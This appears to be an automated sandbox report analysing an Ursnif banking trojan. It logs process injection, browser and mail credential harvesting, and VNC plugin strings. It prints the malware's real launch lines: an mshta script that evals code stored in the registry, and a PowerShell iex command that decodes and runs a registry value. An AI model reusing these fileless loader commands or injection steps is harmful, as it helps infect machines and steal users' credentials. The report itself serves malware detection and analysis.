                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\control.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2918
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6023
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\xxfxarla\xxfxarla.dllJump to dropped file
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\5ycfw01g\5ycfw01g.dllJump to dropped file
                Source: C:\Windows\System32\loaddll32.exe TID: 5768Thread sleep time: -120000s >= -30000s
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4540Thread sleep time: -3689348814741908s >= -30000s
                Source: C:\Windows\explorer.exe TID: 3984Thread sleep time: -3005658240s >= -30000s
                Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_026742B4 RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,
                Source: explorer.exe, 0000001E.00000000.845693357.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
                Source: explorer.exe, 0000001E.00000000.840037908.00000000058C0000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000021.00000002.913809482.0000027D4F440000.00000002.00000001.sdmp, WerFault.exe, 00000025.00000002.883131982.0000000004B50000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000027.00000002.913091879.000001B4FA9B0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
                Source: RuntimeBroker.exe, 00000021.00000002.909095475.0000027D4C640000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: explorer.exe, 0000001E.00000000.845693357.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
                Source: explorer.exe, 0000001E.00000003.905601233.000000000DC82000.00000004.00000040.sdmpBinary or memory string: gencounter Microsoft Hyper-V Gene Kernel
                Source: explorer.exe, 0000001E.00000003.905601233.000000000DC82000.00000004.00000040.sdmpBinary or memory string: vmgid Microsoft Hyper-V Gues Kernel
                Source: explorer.exe, 0000001E.00000003.905601233.000000000DC82000.00000004.00000040.sdmpBinary or memory string: bttflt Microsoft Hyper-V VHDP Kernel
                Source: WerFault.exe, 00000025.00000003.879906098.0000000004AD2000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
                Source: explorer.exe, 0000001E.00000003.905601233.000000000DC82000.00000004.00000040.sdmpBinary or memory string: vpci Microsoft Hyper-V Virt Kernel
                Source: explorer.exe, 0000001E.00000000.838462284.0000000004710000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
                Source: WerFault.exe, 00000025.00000003.879906098.0000000004AD2000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAWk
                Source: explorer.exe, 0000001E.00000000.845870000.000000000A716000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
                Source: explorer.exe, 0000001E.00000000.840037908.00000000058C0000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000021.00000002.913809482.0000027D4F440000.00000002.00000001.sdmp, WerFault.exe, 00000025.00000002.883131982.0000000004B50000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000027.00000002.913091879.000001B4FA9B0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
                Source: RuntimeBroker.exe, 00000021.00000002.912423816.0000027D4E762000.00000004.00000001.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&1EC51BF7&0&000000
                Source: explorer.exe, 0000001E.00000000.840037908.00000000058C0000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000021.00000002.913809482.0000027D4F440000.00000002.00000001.sdmp, WerFault.exe, 00000025.00000002.883131982.0000000004B50000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000027.00000002.913091879.000001B4FA9B0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
                Source: explorer.exe, 0000001E.00000003.905601233.000000000DC82000.00000004.00000040.sdmpBinary or memory string: storflt Microsoft Hyper-V Stor Kernel
                Source: explorer.exe, 0000001E.00000000.845951984.000000000A784000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
                Source: explorer.exe, 0000001E.00000003.905640815.000000000DC69000.00000004.00000040.sdmpBinary or memory string: Hyper-V Requirements: VM Monitor Mode Extensions: No
                Source: explorer.exe, 0000001E.00000000.840037908.00000000058C0000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000021.00000002.913809482.0000027D4F440000.00000002.00000001.sdmp, WerFault.exe, 00000025.00000002.883131982.0000000004B50000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000027.00000002.913091879.000001B4FA9B0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
                Source: C:\Windows\System32\loaddll32.exeProcess information queried: ProcessInformation
                Source: C:\Windows\System32\loaddll32.exeProcess queried: DebugPort
                Source: C:\Windows\System32\loaddll32.exeProcess queried: DebugPort
                Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_011115D2 GetLastError,NtClose,LdrInitializeThunk,
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                Source: C:\Windows\SysWOW64\WerFault.exeProcess token adjusted: Debug

                HIPS / PFW / Operating System Protection Evasion:

                barindex
                Allocates memory in foreign processesShow sources
                Source: C:\Windows\System32\loaddll32.exeMemory allocated: C:\Windows\System32\control.exe base: 1050000 protect: page execute and read and write
                Source: C:\Windows\explorer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 27D4F3D0000 protect: page execute and read and write
                Source: C:\Windows\explorer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1B4FAC50000 protect: page execute and read and write
                Source: C:\Windows\System32\control.exeMemory allocated: C:\Windows\System32\rundll32.exe base: 284AA390000 protect: page execute and read and write
                Changes memory attributes in foreign processes to executable or writableShow sources
                Source: C:\Windows\explorer.exeMemory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute and read and write
                Source: C:\Windows\explorer.exeMemory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute read
                Source: C:\Windows\explorer.exeMemory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute and read and write
                Source: C:\Windows\explorer.exeMemory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute and read and write
                Source: C:\Windows\explorer.exeMemory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute read
                Source: C:\Windows\explorer.exeMemory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute and read and write
                Source: C:\Windows\explorer.exeMemory protected: unknown base: 7FFABD4F1580 protect: page execute and read and write
                Source: C:\Windows\explorer.exeMemory protected: unknown base: 7FFABD4F1580 protect: page execute read
                Source: C:\Windows\explorer.exeMemory protected: unknown base: 7FFABD4F1580 protect: page execute and read and write
                Source: C:\Windows\explorer.exeMemory protected: unknown base: 7FFABD4F1580 protect: page execute and read and write
                Source: C:\Windows\explorer.exeMemory protected: unknown base: 7FFABD4F1580 protect: page execute read
                Source: C:\Windows\explorer.exeMemory protected: unknown base: 7FFABD4F1580 protect: page execute and read and write
                Source: C:\Windows\explorer.exeMemory protected: unknown base: 7FFABD4F1580 protect: page execute and read and write
                Source: C:\Windows\explorer.exeMemory protected: unknown base: 7FFABD4F1580 protect: page execute read
                Source: C:\Windows\explorer.exeMemory protected: unknown base: 7FFABD4F1580 protect: page execute and read and write
                Source: C:\Windows\System32\control.exeMemory protected: unknown base: 7FFABD4F1580 protect: page execute and read and write
                Source: C:\Windows\System32\control.exeMemory protected: unknown base: 7FFABD4F1580 protect: page execute read
                Source: C:\Windows\System32\control.exeMemory protected: unknown base: 7FFABD4F1580 protect: page execute and read and write
                Compiles code for process injection (via .Net compiler)Show sources
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile written: C:\Users\user\AppData\Local\Temp\xxfxarla\xxfxarla.0.csJump to dropped file
                Creates a thread in another existing process (thread injection)Show sources
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread created: C:\Windows\explorer.exe EIP: BD4F1580
                Source: C:\Windows\explorer.exeThread created: C:\Windows\System32\RuntimeBroker.exe EIP: BD4F1580
                Source: C:\Windows\explorer.exeThread created: C:\Windows\System32\RuntimeBroker.exe EIP: BD4F1580
                Source: C:\Windows\explorer.exeThread created: unknown EIP: BD4F1580
                Source: C:\Windows\explorer.exeThread created: unknown EIP: BD4F1580
                Source: C:\Windows\explorer.exeThread created: unknown EIP: BD4F1580
                Source: C:\Windows\System32\control.exeThread created: unknown EIP: BD4F1580
                Injects code into the Windows Explorer (explorer.exe)Show sources
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: PID: 3424 base: 9EC000 value: 00
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: PID: 3424 base: 7FFABD4F1580 value: EB
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: PID: 3424 base: 4980000 value: 80
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: PID: 3424 base: 7FFABD4F1580 value: 40
                Maps a DLL or memory area into another processShow sources
                Source: C:\Windows\System32\loaddll32.exeSection loaded: unknown target: C:\Windows\System32\control.exe protection: execute and read and write
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
                Source: C:\Windows\explorer.exeSection loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write
                Source: C:\Windows\explorer.exeSection loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write
                Source: C:\Windows\explorer.exeSection loaded: unknown target: unknown protection: execute and read and write
                Source: C:\Windows\explorer.exeSection loaded: unknown target: unknown protection: execute and read and write
                Source: C:\Windows\explorer.exeSection loaded: unknown target: unknown protection: execute and read and write
                Source: C:\Windows\explorer.exeSection loaded: unknown target: unknown protection: execute and read and write
                Source: C:\Windows\System32\control.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
                Source: C:\Windows\System32\control.exeSection loaded: unknown target: C:\Windows\System32\rundll32.exe protection: execute and read and write
                Modifies the context of a thread in another process (thread injection)Show sources
                Source: C:\Windows\System32\loaddll32.exeThread register set: target process: 6752
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread register set: target process: 3424
                Source: C:\Windows\explorer.exeThread register set: target process: 3656
                Source: C:\Windows\explorer.exeThread register set: target process: 4268
                Source: C:\Windows\explorer.exeThread register set: target process: 4772
                Source: C:\Windows\explorer.exeThread register set: target process: 5772
                Source: C:\Windows\explorer.exeThread register set: target process: 6228
                Source: C:\Windows\explorer.exeThread register set: target process: 6020
                Source: C:\Windows\System32\control.exeThread register set: target process: 3424
                Source: C:\Windows\System32\control.exeThread register set: target process: 5528
                Writes to foreign memory regionsShow sources
                Source: C:\Windows\System32\loaddll32.exeMemory written: C:\Windows\System32\control.exe base: 7FF672E412E0
                Source: C:\Windows\System32\loaddll32.exeMemory written: C:\Windows\System32\control.exe base: 1050000
                Source: C:\Windows\System32\loaddll32.exeMemory written: C:\Windows\System32\control.exe base: 7FF672E412E0
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\explorer.exe base: 9EC000
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\explorer.exe base: 7FFABD4F1580
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\explorer.exe base: 4980000
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\explorer.exe base: 7FFABD4F1580
                Source: C:\Windows\explorer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 8C7CFF1000
                Source: C:\Windows\explorer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580
                Source: C:\Windows\explorer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 27D4F3D0000
                Source: C:\Windows\explorer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580
                Source: C:\Windows\explorer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 7386885000
                Source: C:\Windows\explorer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580
                Source: C:\Windows\explorer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1B4FAC50000
                Source: C:\Windows\explorer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580
                Source: C:\Windows\System32\control.exeMemory written: C:\Windows\System32\rundll32.exe base: 7FF6A9395FD0
                Source: C:\Windows\System32\control.exeMemory written: C:\Windows\System32\rundll32.exe base: 284AA390000
                Source: C:\Windows\System32\control.exeMemory written: C:\Windows\System32\rundll32.exe base: 7FF6A9395FD0
                Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
                Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers))
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\5ycfw01g\5ycfw01g.cmdline'
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\xxfxarla\xxfxarla.cmdline'
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES4E97.tmp' 'c:\Users\user\AppData\Local\Temp\5ycfw01g\CSC315BF7D299C343BDBB661915DC5BF6A.TMP'
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES5D9B.tmp' 'c:\Users\user\AppData\Local\Temp\xxfxarla\CSC41D1ABDD5ED14B1EB51F15F27222E36E.TMP'
                Source: C:\Windows\System32\control.exeProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
                Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                Source: unknownProcess created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\Audiinrt'));if(!window.flag)close()</script>'
                Source: explorer.exe, 0000001E.00000000.830065181.0000000000AD8000.00000004.00000020.sdmpBinary or memory string: ProgmanMD6
                Source: explorer.exe, 0000001E.00000002.910386798.0000000001080000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000021.00000002.910671996.0000027D4CC60000.00000002.00000001.sdmpBinary or memory string: Program Manager
                Source: explorer.exe, 0000001E.00000002.910386798.0000000001080000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000021.00000002.910671996.0000027D4CC60000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
                Source: explorer.exe, 0000001E.00000002.910386798.0000000001080000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000021.00000002.910671996.0000027D4CC60000.00000002.00000001.sdmpBinary or memory string: Progman
                Source: explorer.exe, 0000001E.00000002.910386798.0000000001080000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000021.00000002.910671996.0000027D4CC60000.00000002.00000001.sdmpBinary or memory string: Progmanlock
                Source: explorer.exe, 0000001E.00000000.845870000.000000000A716000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWnd5D
                Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02675F3A cpuid
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0111179C GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError,
                Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02675F3A RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,
                Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_01111CE1 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                Stealing of Sensitive Information:

                barindex
                Yara detected UrsnifShow sources
                Source: Yara matchFile source: 00000000.00000003.683789524.0000000003178000.00000004.00000040.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000020.00000003.843504876.000001A778130000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.683743665.0000000003178000.00000004.00000040.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001E.00000003.852406498.0000000003190000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000027.00000002.914135566.000001B4FAD45000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.886882994.00000000009B0000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000023.00000002.857674347.00000284AA705000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.779793362.0000000002F7C000.00000004.00000040.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.683848326.0000000003178000.00000004.00000040.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.683682102.0000000003178000.00000004.00000040.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000020.00000002.856702650.0000000000FE5000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000021.00000002.914614455.0000027D4F835000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.683714735.0000000003178000.00000004.00000040.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.835757240.00000000009E0000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.683763828.0000000003178000.00000004.00000040.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000023.00000003.856122162.00000284AA500000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.683813516.0000000003178000.00000004.00000040.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000018.00000003.826681690.000001D7C46A0000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.683833344.0000000003178000.00000004.00000040.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 3424, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: control.exe PID: 6752, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 6536, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 3656, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6476, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5528, type: MEMORY
                Tries to harvest and steal browser information (history, passwords, etc)Show sources
                Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_000008
                Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_000009
                Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_000007
                Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_00000a
                Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_00000b
                Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\index
                Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\data_0
                Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\data_1
                Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\data_2
                Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\data_3
                Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_000001
                Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_000004
                Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_000005
                Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_000002
                Tries to steal Mail credentials (via file access)Show sources
                Source: C:\Windows\explorer.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
                Source: C:\Windows\explorer.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

                Remote Access Functionality:

                barindex
                Yara detected UrsnifShow sources
                Source: Yara matchFile source: 00000000.00000003.683789524.0000000003178000.00000004.00000040.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000020.00000003.843504876.000001A778130000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.683743665.0000000003178000.00000004.00000040.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001E.00000003.852406498.0000000003190000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000027.00000002.914135566.000001B4FAD45000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.886882994.00000000009B0000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000023.00000002.857674347.00000284AA705000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.779793362.0000000002F7C000.00000004.00000040.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.683848326.0000000003178000.00000004.00000040.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.683682102.0000000003178000.00000004.00000040.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000020.00000002.856702650.0000000000FE5000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000021.00000002.914614455.0000027D4F835000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.683714735.0000000003178000.00000004.00000040.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.835757240.00000000009E0000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.683763828.0000000003178000.00000004.00000040.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000023.00000003.856122162.00000284AA500000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.683813516.0000000003178000.00000004.00000040.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000018.00000003.826681690.000001D7C46A0000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.683833344.0000000003178000.00000004.00000040.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 3424, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: control.exe PID: 6752, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 6536, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 3656, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6476, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5528, type: MEMORY
                Contains VNC / remote desktop functionality (version string found)Show sources
                Source: control.exe, 00000020.00000003.854967978.000001A77A0DC000.00000004.00000040.sdmpString found in binary or memory: | LOAD_PLUGIN = file://c:\test\vnc32.dll, file://c:\test\vnc64.dll
                Source: RuntimeBroker.exe, 00000021.00000002.914359235.0000027D4F702000.00000004.00000001.sdmpString found in binary or memory: GET_SYSINFO | LOAD_PLUGIN = file://c:\test\vnc32.dll, file://c:\test\vnc64.dll
